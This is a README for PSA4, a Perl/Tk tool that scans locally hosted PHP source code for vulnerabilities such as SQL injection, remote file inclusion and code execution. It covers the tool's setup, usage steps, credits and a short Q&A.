PSA4

About

PHP Source Auditor 4 (or PSA4) is made for quickly finding (obvious) vulnerabilities in PHP Source Codes, which can be used by webmasters, developers or security-interested persons.

Note: it hasn't been tested too well and bugs could happen, please e-mail me (my e-mail is below) if you find any bugs or have ideas to improve this piece of software. The identification of SQL injection just plain sucks and sometimes the app starts recognizing RCE's everywhere, this is the fault of Easy-PHP! :(

Usage

The application has the following requirements to function properly:

• A local PHP server with the ability to turn Register_globals = On (I recommend Easy-PHP 1.8 or Apache on Linux)
• The source code of the PHP application you will scan.
• A Perl executer (eg ActivePerl is you're on Windows) + Perl::Tk; and LWP::UserAgent extension.

Once these requirements are met, you have to put the PHP source codes you want to scan in the folder where your document_root is located, for example: www or public_html.

If the webserver is running you can open the scanner with your perl executer, if everything went well you should now have a GUI window with some instructions. Do a "Test Run" and see if he gives any errors, if not: start the scan by clicking "Scan". The application will appear frozen but after some time a list with vulnerabilities (if any) will appear next to the menu. Select a vulnerability and click "detailed" for more information. In the file "results.html" you will find a brief report on all vulnerabilities found, in the file "archive.txt" you will find all vulnerabilities (just the url's) you have ever found.

To do

Nothing, I hope. This version is final, I'm done writing this crap.

Credits & Thanks

All the design & programming is the result of Iron having a bad day. The idea is powered by Stansar from RootShell Security Group. Thanks and greets fly to anyone who didn't leak it, tested it, contributed ideas or information, helped me out when I was tired of my sucky coding, amused me out when I was dead-bored, and especially thanks to all people who visit randombase.com!

Q & A

PSA4? Where is PSA1 & PSA2 & PSA3?
The tool was written for a 'private' audience, those versions weren't as 'cool' as this one now if you feel bad about not seeing this. PSA1 was nothing more but a powerful RFI scanner while PSA2 managed to combine more features in a bad design. PSA3 was the first version to actually be released, but was emm.. buggy.

I have a question, where do I go?
You can mail me at i@randombase.com or maybe better, post your question at the RandomBase forums or at my blog.